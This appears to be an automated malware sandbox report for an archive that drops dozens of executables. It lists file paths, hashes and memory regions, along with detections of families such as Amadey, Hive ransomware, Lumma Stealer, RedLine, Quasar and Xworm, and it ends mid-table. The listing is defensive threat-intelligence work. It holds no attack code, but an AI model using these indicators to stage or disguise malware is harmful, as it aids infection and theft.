| SHA1 | a687dc87c8fb69c7a6632c990145ae8d598113ce |
| SHA256 | db032c18992b20def16589678eb07e0d3f74e971f4efc07196d7cd70a16753bc |
| SHA512 | 76e33c6b965ffb47f0a2838ca0571134cdf32ab9f6808bc21e6ca060b4d23e15cd686bd6d57571dbc613aa6e17a3702264079f2bc411de1a72a7d1e01afc469f |
memory/4480-4518-0x0000000000400000-0x000000000072D000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Files\clip.exe
| MD5 | 6ca0b0717cfa0684963ff129abb8dce9 |
| SHA1 | 69fb325f5fb1fe019756d68cb1555a50294dd04a |
| SHA256 | 2500aa539a7a5ae690d830fae6a2b89e26ba536f8751ba554e9f4967d48e6cfa |
| SHA512 | 48f9435cf0a17aed8ff4103fa4d52e9c56f6625331a8b9627b891a5ccada14f14c2641aac6a5c09570f26452e5416ac28b31fe760a3f8ba2f5fe9222d3c336ee |
C:\Users\Admin\AppData\Local\Temp\Files\random.exe
| MD5 | ae894f6f2d4c93aa3845f9889d10da88 |
| SHA1 | 54acac7e5d04ff2ee799b309e27397a05e6a786d |
| SHA256 | cac0d0d0a60d2b6413f9c4831ac35ef9b5129dc8ce2873980c216d25ebb827ca |
| SHA512 | c0332417eb9c5e87585772f21688504355d2943d58ea7203284b80acc9b582dcf4ec6b90ec1107776cd5c802227bd155069b3d3a84c7fe3dac048423ed7e53d4 |
memory/5304-4536-0x0000000000910000-0x0000000000DB1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nd5zb2ol.0le.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/6112-4546-0x00000180EC290000-0x00000180EC2B2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Files\test_again2.exe
| MD5 | 52a2fc805aa8e8610249c299962139ed |
| SHA1 | ab3c1f46b749a3ef8ad56ead443e26cde775d57d |
| SHA256 | 4801ead85ca08f439f695f198f5a87032c688143b3fe679b2b0872102c0d58ea |
| SHA512 | 2e6897092f3e25da023b003975f2fa5f45a4a2a115bc56460d15b21933da517fd7e1e98dcdad49196236614a516c710c19f4bfd4603776b620eb6d9c31c02cdf |
C:\Users\Admin\AppData\Local\Temp\Files\14082024.exe
| MD5 | 9bba979bb2972a3214a399054242109b |
| SHA1 | 60adcedb0f347580fb2c1faadb92345c602c54e9 |
| SHA256 | 17b71b1895978b7aaf5a0184948e33ac3d70ce979030d5a9a195a1c256f6b368 |
| SHA512 | 89285f67c4c40365f4028bc18dd658ad40b68ff3bcf15f2547fc8f9d9c3d8021e2950de8565e03451b9b4ebace7ed557df24732af632fdb74cbd9eb02cf08788 |
memory/216-4568-0x0000000000CD0000-0x0000000000D22000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Files\Amadey.exe
| MD5 | bb63e746e54ae6a1ff2d5d01fc4b6c61 |
| SHA1 | b22879f1eb81aabb7cf37fd531f85724f84fdc09 |
| SHA256 | 18aeb7be496d51bada50f3781764bb7771f74d7050e3ceefa51725b3f86a59f6 |
| SHA512 | a7ad6ecb848789cd32090863ef5196dab836a4a5937b988516e0d72f69b2fb6459db9baf0ff8281d301134cbf9a66d2b889fb647ad0f637cf0e03f46cea23e42 |
memory/5304-4619-0x0000000000910000-0x0000000000DB1000-memory.dmp
C:\ProgramData\remcos\logs.dat
| MD5 | 2fd947b90607000d0ab8bbb0bc66b283 |
| SHA1 | 9d3f1d7712efceba9c1e602a41bb8db6bfdcae9c |
| SHA256 | a7796555d5ed8c146925ec8fa0c6426b5a24e3f6d811d8925999db37d2a0ecf0 |
| SHA512 | d147a8785eacb9d42d38c5d988ba6410a5b2430c43ae4ff1bf5cabab8d6b69695c3054c1935e4c7cb6afc54deeb397a3786c40bd4b1fa4c86f51e9207f19840f |
C:\Users\Admin\AppData\Local\Temp\Files\Setup2.exe
| MD5 | 37263ede84012177cab167dc23457074 |
| SHA1 | 5905e3b2db8ff152a7f43f339c053e1d43b44dfc |
| SHA256 | 9afd9e70b6f166cfc6de30e206dff5963073a6faeff5bcc93ee131df79894fc2 |
| SHA512 | 6b08af27c18fcaadcdc72af7e17cf9fe856526eab783ed9eb9420cf44fd85bf8a263c88d0f98bc367156bc01d61c6e0c8d098246760b20ed57efae292b68fe7e |
memory/3364-4683-0x00000000050A0000-0x00000000050C2000-memory.dmp
memory/3364-4682-0x0000000004F60000-0x0000000005036000-memory.dmp
memory/2944-4687-0x0000000000400000-0x000000000040E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Files\gweadtrgh.exe
| MD5 | 3a94ac80a1bbe958b6544874f311be69 |
| SHA1 | bc6352ee84bed107a4b30b545934698c4e664baf |
| SHA256 | 1839ee5c3534ad1a6929c9de33bce63cf6f96cce1ae3dc8240f4cf352250db0f |
| SHA512 | f31d93889251ec2c6581107a7a0122be63d5f7b8253403736d38f1d2ffa2cb693e30a205ceb36b823265fd58bb2854cc44064988110daf3fe1c8ea02e7d2227c |
memory/3476-4697-0x0000000000400000-0x000000000066D000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\050598569159
| MD5 | 239d42d74d13a6cb283992ac00fb9813 |
| SHA1 | ef06e1a356708a9417d3346b8fe9a7eb014002a9 |
| SHA256 | 5b35c2dce6ba78dcbea7bd55476839430aba5ea6573b3506afa4abc397965c8f |
| SHA512 | 534737ee57642669e79f82601f27cc735471d3d1016af0d31b94ae355631e9135cec75fa8ea7a2cbcb9bcb47715c10e7a2a04ea354594ee4f385d3a3031afda6 |
C:\Users\Admin\AppData\Local\Temp\Files\RuntimeBroker.exe
| MD5 | 7ae9e9867e301a3fdd47d217b335d30f |
| SHA1 | d8c62d8d73aeee1cbc714245f7a9a39fcfb80760 |
| SHA256 | 932cb7b1080180487be4b5754bd92600409bafda80d412018a792a8930c6a46c |
| SHA512 | 063648705e1817a1df82c9a595e4bbe8e0b1dbb7e31a6517df59905ebe7f22160f4acb55349d03dfe70744a14fd53c59a4c657c7a96646fcccf1c2214fc803dd |
memory/4368-4717-0x00000000002A0000-0x00000000005C4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Files\AutoUpdate.exe
| MD5 | a46fbc93be901a82afe29942b96067dd |
| SHA1 | 89fa610d6cec3205c2662e9997c55113fbe211ae |
| SHA256 | 2d3e29c33e0de171b8f4a1c31217df92a2adb6540860ca9ae1365170f9f80aee |
| SHA512 | 228d6beaf5d1e1d60d53cd7628f9dee27e1045f7bf1aeddd464ca43e257860f94b5c66013abe13e0b55d812cd4e4c6ee080563057c14ab355ff279e2093776d3 |
C:\Users\Admin\AppData\Local\Temp\Files\Offnewhere.exe
| MD5 | c07e06e76de584bcddd59073a4161dbb |
| SHA1 | 08954ac6f6cf51fd5d9d034060a9ae25a8448971 |
| SHA256 | cf67a50598ee170e0d8596f4e22f79cf70e1283b013c3e33e36094e1905ba8d9 |
| SHA512 | e92c9fcd0448591738daedb19e8225ff05da588b48d1f15479ec8af62acd3ea52b5d4ba3e3b0675c2aa1705185f5523dcafdf14137c6e2984588069a2e05309f |
C:\Users\Admin\AppData\Local\Temp\Files\Hive%20Ransomware.exe
| MD5 | 2f9fc82898d718f2abe99c4a6fa79e69 |
| SHA1 | 9d336b8911c8ffd7cc809e31d5b53796bb0cc7bb |
| SHA256 | 88f7544a29a2ceb175a135d9fa221cbfd3e8c71f32dd6b09399717f85ea9afd1 |
| SHA512 | 19f0879b1c54d305ab7a97a0d46ab79c103d4687fe37d5f9ef1934904eea48a1c66b1ac2de3dace6dc0d91623309287044c198cb0b3fc9f8453fbc9d1c0cae8b |
memory/5380-4770-0x0000000000F50000-0x00000000011B3000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Files\svhost.exe
| MD5 | e3cfe28100238a1001c8cca4af39c574 |
| SHA1 | 9b80ea180a8f4cec6f787b6b57e51dc10e740f75 |
| SHA256 | 78f9c811e589ff1f25d363080ce8d338fa68f6d2a220b1dd0360e799bbc17a12 |
| SHA512 | 511e8a150d6539f555470367933e5f35b00d129d3ed3e97954da57f402d18711dfc86c93acc26f5c2b1b18bd554b8ea4af1ad541cd2564b793acc65251757324 |
memory/1064-4781-0x00000000000E0000-0x0000000000164000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Files\boleto.exe
| MD5 | 2a4ccc3271d73fc4e17d21257ca9ee53 |
| SHA1 | 931b0016cb82a0eb0fd390ac33bada4e646abae3 |
| SHA256 | 5332f713bef3ab58d7546f2b58e6eaf55c3e30969e15b6085a77e7fd9e7b65b4 |
| SHA512 | 00d6728fa5c2692dab96107187126a44e09976f0d26875f340b3ad0d3f202abb4fbc5426f2934096087ef6e404bc1dc21b6e6ebbacba172c383d57bdef185a74 |
memory/1188-4791-0x0000000000800000-0x0000000000818000-memory.dmp
memory/5380-4838-0x0000000000F50000-0x00000000011B3000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Files\ama.exe
| MD5 | 077b16532e2f2bc14848b1b90faaa4db |
| SHA1 | 4f98a243cb26ad1b2c5c2671ebf16b1c4631837d |
| SHA256 | 8e9ed73e06887f551baaccf5705e6dd5aea7a2e186d92afb0c9655f106408939 |
| SHA512 | acb531b322efa44390a09a1ff62947ebf009efc9cd591e971deff05d8ef6c8b0afb0b58fe86359e92cd6383481f8a01fea29e2c56b08e7c2b33cf64a4f0705de |
memory/4688-4851-0x00000000008C0000-0x0000000000D79000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Files\zeropersca.exe
| MD5 | 54b809ae715bbf1575987141ebc06d9c |
| SHA1 | b3dde84144467b3073cce84e1ef1981cd7949930 |
| SHA256 | 9a3d5b3bb4061c11f0828bfe358d3bc7f9ac4e62be67aa35cc4e53b5d140cb67 |
| SHA512 | e5ead6ece85209e64a51487903fe080b4d2a721583be30d41915d1b695777c86651cf970a3b634ec019a2f0f9966dedafdfa0d63374593de3c95d1086ef9ee87 |
memory/3272-4862-0x00000000003E0000-0x0000000000461000-memory.dmp
memory/4688-4874-0x00000000008C0000-0x0000000000D79000-memory.dmp
memory/5504-4875-0x0000000000B10000-0x0000000000FC9000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Files\builder.exe
| MD5 | c2bc344f6dde0573ea9acdfb6698bf4c |
| SHA1 | d6ae7dc2462c8c35c4a074b0a62f07cfef873c77 |
| SHA256 | a736269f5f3a9f2e11dd776e352e1801bc28bb699e47876784b8ef761e0062db |
| SHA512 | d60cf86c0267cd4e88d21768665bbb43f3048dace1e0013b2361c5bfabf2656ff6215dfb75b6932e09545473305b4f707c069721cdde317b1df1709cd9fc61c0 |
C:\Users\Admin\AppData\Local\Temp\Files\crack.exe
| MD5 | 53e21b02d31fa26942aebea39296b492 |
| SHA1 | 150f2d66d9b196e545ac5695a8a0001dbd2ef154 |
| SHA256 | eecdeeffe3f7627f27eb2683d657a63503744e832702890f4bc97724aeaed73d |
| SHA512 | 030f9ab458ecc9954089e88075ca5a9e8bf8fe07483b96a563bc77feaf59cdc4916ed2cc139e7192dcb6f9dc388b8beb837754cf8e79c7c2326ebd02ca5821d1 |
memory/3272-4898-0x00000000003E0000-0x0000000000461000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Files\kohjaekdfth.exe
| MD5 | 4992863093cb396628acfb86b56af1e6 |
| SHA1 | 4f61861be36c992e420dd387997322130ba2164d |
| SHA256 | c4fcb04af557153060abc9488b017c3875074dcda7a84c59a18cee798e95ef56 |
| SHA512 | d6dd52bdd607837ba685ee672410db23d3cc0a1de2a01ef5ad46e55401e205ac14795591fb03e3deb330a93c1a587d6e4d5a065a42d7b2da5ad069ae60cae8fc |
C:\Users\Admin\AppData\Local\Temp\Files\popapoers.exe
| MD5 | d9a23524fc7e744b547ee35a00c80cae |
| SHA1 | ac189d3ed4a5c8d094dbb0f9197c88f92f567929 |
| SHA256 | b41ad61bdf186fe82b70dc045791e0bab5d9566ba56b010b19c494dbbd70db31 |
| SHA512 | f815ad8516aa3d4c4f35abc2a42b8e6119cd2a022d9475e2c9cc25649736a89cb7b46f2b3def79bfdcb82bc9798de397a8b95f6fe04ba337c90d1c1b85cb4861 |
memory/5604-4931-0x0000000000510000-0x000000000054C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Files\av_downloader1.1.exe
| MD5 | 759f5a6e3daa4972d43bd4a5edbdeb11 |
| SHA1 | 36f2ac66b894e4a695f983f3214aace56ffbe2ba |
| SHA256 | 2031202030b1581acb6694f7ba528431a5015c7c37a4c6bcc0e1afdbca6f120d |
| SHA512 | f97c793e1489e09dc6867bc9fb8a8e6073e08e1019b7a6fd57efdb31099047fcef9bc7bc3a8194742d7998f075c50e5d71670711bf077da1ac801aab7d19b385 |
memory/5768-4954-0x0000000002C90000-0x0000000002CC6000-memory.dmp
memory/5768-4955-0x0000000005680000-0x0000000005CA8000-memory.dmp
memory/5768-4969-0x0000000005DE0000-0x0000000005E02000-memory.dmp
memory/5768-4978-0x0000000006060000-0x00000000060C6000-memory.dmp
memory/5768-4974-0x0000000005E80000-0x0000000005EE6000-memory.dmp
memory/5768-4979-0x00000000061D0000-0x0000000006524000-memory.dmp
memory/5768-4983-0x0000000006550000-0x000000000656E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Files\4434.exe
| MD5 | 607c413d4698582cc147d0f0d8ce5ef1 |
| SHA1 | c422ff50804e4d4e55d372b266b2b9aa02d3cfdd |
| SHA256 | 46a8a9d9c639503a3c8c9654c18917a9cedbed9c93babd14ef14c1e25282c0d5 |
| SHA512 | d139f1b76b2fbc68447b03a5ca21065c21786245c8f94137c039d48c74996c10c46ca0bdd7a65cd9ccdc265b5c4ca952be9c2876ced2928c65924ef709678876 |
memory/5768-4995-0x0000000007530000-0x00000000075C6000-memory.dmp
memory/5768-4997-0x0000000007490000-0x00000000074B2000-memory.dmp
memory/5768-4996-0x0000000006A40000-0x0000000006A5A000-memory.dmp
memory/5504-5010-0x0000000000B10000-0x0000000000FC9000-memory.dmp
C:\$Recycle.Bin\HOW_TO_DECRYPT.txt
| MD5 | 80207d0f8ea42bdfeaf9f5c586230aca |
| SHA1 | 747481fe2b0b6d81c3b19ba62d1e49eab6a5461f |
| SHA256 | 25edefb3b0678dfe0d927ff48ce67254359ba379df9468f634d02c026f0e7131 |
| SHA512 | 73f68ce9e98d2346be1762bd54bb06ef83ae939dfbcf9b786d9b773fa454352613387d264b7a87a1c08950226553817bf01f5aa4107bc12de36a1689e2137304 |
memory/5208-5049-0x0000000000B10000-0x0000000000FC9000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | e443ee4336fcf13c698b8ab5f3c173d0 |
| SHA1 | 9bf70b16f03820cbe3158e1f1396b07b8ac9d75a |
| SHA256 | 79e277da2074f9467e0518f0f26ca2ba74914bee82553f935a0ccf64a0119e8b |
| SHA512 | cbf6f6aa0ea69b47f51592296da2b7be1180e7b483c61b4d17ba9ee1a2d3345cbe0987b96f4e25de1438b553db358f330aad8a26e8522601f055c3d5a8313cdd |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 56a4f78e21616a6e19da57228569489b |
| SHA1 | 21bfabbfc294d5f2aa1da825c5590d760483bc76 |
| SHA256 | d036661e765ee8fd18978a2b5501e8df6b220e4bca531d9860407555294c96fb |
| SHA512 | c2c3cd1152bb486028fe75ab3ce0d0bc9d64c4ca7eb8860ddd934b2f6e0140d2c913af4fa082b88e92a6a6d20fd483a1cb9813209f371a0f56374bc97d7f863b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 76e5d4090610a67f1948e8897daa49d4 |
| SHA1 | 631178b15a13c0ff63551039540fbde0126d616e |
| SHA256 | 14fa5eff3538b3e4b59e179ada849f5f088d26058cc26a756eb44dd2acf6f3c2 |
| SHA512 | a318f4e649f1e61b90e9c288526e292156f310166bc768e4bed93f44a97a2e096d14d7f1a08a0ef8ef0488cbc2ec9b6f14bd0b6ebaea1e603e5e0c0db23ac0a3 |
C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll
| MD5 | 0d3418372c854ee228b78e16ea7059be |
| SHA1 | c0a29d4e74d39308a50f4fd21d0cca1f98cb02c1 |
| SHA256 | 885bf0b3b12b77ef3f953fbb48def1b45079faa2a4d574ee16afdbafa1de3ac7 |
| SHA512 | e30dced307e04ae664367a998cd1ba36349e99e363f70897b5d90c898de2c69c393182c3afba63a74956b5e6f49f0635468e88ed31dd1e3c86c21e987ddd2c19 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\HOI3BGS3\76561199803837316[1].htm
| MD5 | d5085dc60227b55713a398134e08aac0 |
| SHA1 | f412a1a7972b7f7d4b63e3a101a0afc99e3c3a17 |
| SHA256 | 7c37b58840ded35b3677d9c7137485899680773ed09162f1447bb45137e3cf35 |
| SHA512 | acaa2037197420d4a8ca8cdb13b873c4bc31b48cb56f2a98cf4ccb9315963e61b71cdeb8a4f5961e9ec059c3582a196fd5b217415059ebd51c249dd2965a457a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 58e9cd57998ac948c9688a47c547101f |
| SHA1 | ca199511d02e4a0fb5a2f021c1ae9a0a2e13da02 |
| SHA256 | 30bdac6c927fd3eacc8f491ed54ad7034969bb7f72e02ed2ca62963b3d51463b |
| SHA512 | fa52fe88b3db945a24181b21c0dc8ec4205e5e142f8103b04e882f39d3ee026e38d3ef6a96aee81d8cb9773424b07f1b2d95c46841152075710616568d338ef4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | ba07e2fb3f3d828fcf9afd91ae81fe83 |
| SHA1 | 7429354bbfca1689651ab8dbc69cb44e417145fb |
| SHA256 | b090579627911f4f89845e439e2466b8b0533a8c55beb46ac80ab5c4c586488e |
| SHA512 | 394d2aaacc9e6a41b341d536a31d878fcde59529b31b02b82af2451edfac095d2a5e55b3b360cc49573c59c20e8f15396c9b4a6e8a201f455ee21ede75c5085f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 327eb1882458e7b37c1a356b0bd3e793 |
| SHA1 | 3fea461b5f2bfd3944c8a6071705bb636ed0d3bd |
| SHA256 | 5c07d07de7b6a699f212f1d0daf458860d95b6331587e7134a5814256bc283b5 |
| SHA512 | c43d7d1fc7b1d78a512758def58f4f58cb4e3d19016df1231b37ae2456734b2961dbe33ceab32554e90dd7755bd533983cb3d4dd084d3a887473635215683754 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
| MD5 | 41b5be1c63bff041dc9fa76708c19bc2 |
| SHA1 | 61e26ab19299f16d978e55d4ced98b0317303138 |
| SHA256 | 195d16224a98218d3fc17c686aef3747b61305e27b84c5129c729b017c8a1514 |
| SHA512 | 2ed37c0598646f035578b28c38f18164f5442cfecbcdd6122af50e1c2c65ba40aad93c2ee0f5eaaf899be1aa11c6fd58de39bf2d7365703960640c496f801d66 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe5a181d.TMP
| MD5 | 400548cdbafb301b25687f660edb5128 |
| SHA1 | 2123bc5d10cbe1263654dc76d0154537ede54129 |
| SHA256 | ff907f59938d19ed659ad72c9af573f80e397e88e2986b6e5bbef2242a4fa9d7 |
| SHA512 | 13efc255df9fe16f13beb0c3f41b3dc8c61c148d166ccfc5b491abb5459fb4669d5e65db7c1de096d073feed115d0cdc5becf9d1b519361f777371b4a0ef537f |
C:\Users\Admin\AppData\Local\Temp\Files\javaw.exe
| MD5 | b00f13f32231a2de38e2086dd297e250 |
| SHA1 | 3b00864299513546759a102186b1b894f7920884 |
| SHA256 | 00ef210a88f26be8dc6998d53a5eda9158f71842f590eea13d913f8ff3327cb7 |
| SHA512 | 71dc95784c212b3790011660feb3cedf5aa0e6a5a44274ef52d6acbd5d9dbb70d93ce6ea36d28630ab0e26e8a2671d8ce2433feffc4b4b9fbb0864d43a1fec44 |
memory/6476-6256-0x0000000000400000-0x0000000000508000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
memory/3476-19421-0x0000000000400000-0x000000000066D000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Files\5_6190317556063017550.exe
| MD5 | eb89a69599c9d1dde409ac2b351d9a00 |
| SHA1 | a708e9a84067fd6c398ddfd0ac11ae48d9c41e4c |
| SHA256 | e9de3019d8993801fd32f5e00492fa4f5d389100146a1f6f2d7170cb8b7afebd |
| SHA512 | e8fcf4b8ad1747df2595aeea190e2710a42668d4cf5291fa40f67a5317cecb6d62819c9fb26c541e509f756a40858d4714936ab0c5da6ebf62024c098b0f1876 |
memory/47024-32508-0x0000000000400000-0x0000000000508000-memory.dmp
memory/6476-32520-0x0000000000400000-0x0000000000508000-memory.dmp
memory/48580-32532-0x0000000000B10000-0x0000000000FC9000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 08c0f49bc6054d8a6b0804f3c1f91fdb |
| SHA1 | 07b3bab73fc4458052547eeb9c5f34b31766e034 |
| SHA256 | 10300fa9009db201e36e1e49fd059f914d7768c47afc94ddfbfa853b79c24beb |
| SHA512 | 603d6c496611672bca2d97c62c4fe1ad8348e1ea64e18f2b52b92a0513403472a9b96b0c344610732448ef79c41aafef7f008ebf8890526bde27fcd0667dd7c4 |
C:\Users\Admin\AppData\Local\Temp\Files\pjxho1wlkp.exe
| MD5 | 0a998f0fb94d85b0972defa0b7370af3 |
| SHA1 | f2ebf87cf3d925626b90954331b68d25f68c58a7 |
| SHA256 | d78f17f719c48c64af2ad28e69c09d681171abc95535d357c2b34371bfff9c19 |
| SHA512 | 6e6c26f7d8050676976694d9eae070e2f20f5075d461a4219015f977da2cf49fda54bf68e3dac82476f2119a401a1b807191210b12f5c48cfbd213ce7f9ee515 |
C:\Users\Admin\AppData\Local\Temp\Files\jhnykawfkth.exe
| MD5 | d3435ebfc26894fe8b895267ca8712b4 |
| SHA1 | 60bcea02905c09e691043d05837e4942b8c4ae25 |
| SHA256 | 9bb3c3efac7be81d22c386057fe49041d7e7ef3da1974ecb987cc83eae8da103 |
| SHA512 | 8e884c0dcb76ca08c9674fb430b89e1bb9a3f999ac2c0078d2cefedfe72283d3249c5b9851064449294f8e39096f95c760d4c991238ed6338bb9409394872849 |
C:\Users\Admin\AppData\Local\Temp\Files\W4KLQf7.exe
| MD5 | 12c766cab30c7a0ef110f0199beda18b |
| SHA1 | efdc8eb63df5aae563c7153c3bd607812debeba4 |
| SHA256 | 7b2070ca45ec370acba43623fb52931ee52bee6f0ce74e6230179b058fa2c316 |
| SHA512 | 32cad9086d9c7a8d88c3bfcb0806f350f0df9624637439f1e34ab2efffa0c273faef0c226c388ed28f07381aef0655af9e3eb3e9557cbfd2d8c915b556b1cf10 |
C:\Users\Admin\AppData\Local\Temp\Files\svhosts.exe
| MD5 | fcd623c9b95c16f581efb05c9a87affb |
| SHA1 | 17d1c2bede0885186b64cc615d61693eb90332de |
| SHA256 | 3eb7b830379458b4788162b6444f8b8c5b37a3190d86d8e00a6e762093e1f2b9 |
| SHA512 | 7b84854c9e2d979d7b127026b2d45fdd927a857e03278f62d4c728c4a99971b7fe333739e42c65260e677df5cc174c49a817f0a03133bcab1c078683a8850c49 |
memory/28068-33307-0x0000000000B10000-0x0000000000FC9000-memory.dmp
memory/28068-33316-0x0000000000B10000-0x0000000000FC9000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Files\LummaC222222.exe
| MD5 | 2f1d09f64218fffe7243a8b44345b27e |
| SHA1 | 72553e1b3a759c17f54e7b568f39b3f8f1b1cdbe |
| SHA256 | 4a553c39728410eb0ebd5e530fc47ef1bdf4b11848a69889e8301974fc26cde2 |
| SHA512 | 5871e2925ca8375f3c3ce368c05eb67796e1fbec80649d3cc9c39b57ee33f46476d38d3ea8335e2f5518c79f27411a568209f9f6ef38a56650c7436bbaa3f909 |
C:\Users\Admin\AppData\Local\Temp\Files\Edge.exe
| MD5 | e30340895091ee6f449576966e8448fb |
| SHA1 | 4ccb079e7eedbf7113a803c6859241bb56978b4f |
| SHA256 | 126d9d9886f57e39642744a8bf62681577fbee52b88fba4c4c5097b04501eade |
| SHA512 | c9116fc043e188b50294ebf8f3b661c55d73735773f61d90ae6d2f1ad06f84aabeb80953a7cddce7e7f75cefd979f16d684c81dd853bd0673536252882a6e0ee |
C:\Users\Admin\AppData\Local\Temp\Files\reddit.exe
| MD5 | 23544090c6d379e3eca7343c4f05d4d2 |
| SHA1 | c9250e363790a573e9921a68b7abe64f27e63df1 |
| SHA256 | b439d22ed2c1e1f83f3c52d1a7307d9aee8b516166ab221cb6d67b188cd80f56 |
| SHA512 | 6aca78b0653e87ac80d7f562e6ab6d650f4d53d375cad043eb9613c7bbd642f7f82564a872b1b05520a77acbeba9da0540c4cd5a855a28a8188ebe3a4b57775c |
C:\Users\Admin\AppData\Local\Temp\Files\CrSpoofer.exe
| MD5 | 2e87d4e593da9635c26553f5d5af389a |
| SHA1 | 64fad232e197d1bf0091db37e137ef722024b497 |
| SHA256 | 561c94494c3cd0b918bdf5eb323682fad6596a0a54c4cdd85a99880b4028b3f8 |
| SHA512 | 0667ddaea41c4c4f21e7bc249384230763c4be7d9c01d6b1cf694da647fbcd66de859afad5f7c88399656da48b349e892f22301380da0bd100199e9c5b23c2e3 |
memory/11116-33381-0x0000000000190000-0x00000000001E4000-memory.dmp
memory/13096-33683-0x00000000063C0000-0x0000000006714000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\050598569159
| MD5 | f693ab0c91796a471eb5fc701a02ef33 |
| SHA1 | 8f64112e239be6b1badeffb8e499711c9d9fd1ad |
| SHA256 | 7bf64ff61b8bc71419511801afeced998719ea48569936326037c61109fcd691 |
| SHA512 | c1e70812b6fa143f06232a9e9702ee9d42185fffdae82cafde4d3752fdb06d86f6e84ad816a6cc85dc58b24960cc344f8652b258cd6a424d0eff217fc5b4cfe0 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-12-12 18:20
Reported
2024-12-12 18:25
Platform
win10v2004-20241007-en
Max time kernel
149s
Max time network
273s
Command Line
Signatures
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeRestorePrivilege | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: 35 | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Processes
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exse.zip"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.163.245.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 252.15.104.51.in-addr.arpa | udp |
Files
Analysis: behavioral5
Detonation Overview
Submitted
2024-12-12 18:20
Reported
2024-12-12 18:25
Platform
win10v2004-20241007-en
Max time kernel
161s
Max time network
301s
Command Line
Signatures
44Caliber
44Caliber family
Detect Umbral payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Discord RAT
Discordrat family
Gurcu family
Gurcu, WhiteSnake
Lumma Stealer, LummaC
Lumma family
Quasar RAT
Quasar family
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
RMS
RedLine
RedLine payload
| Description | Indicator | Process | Target |
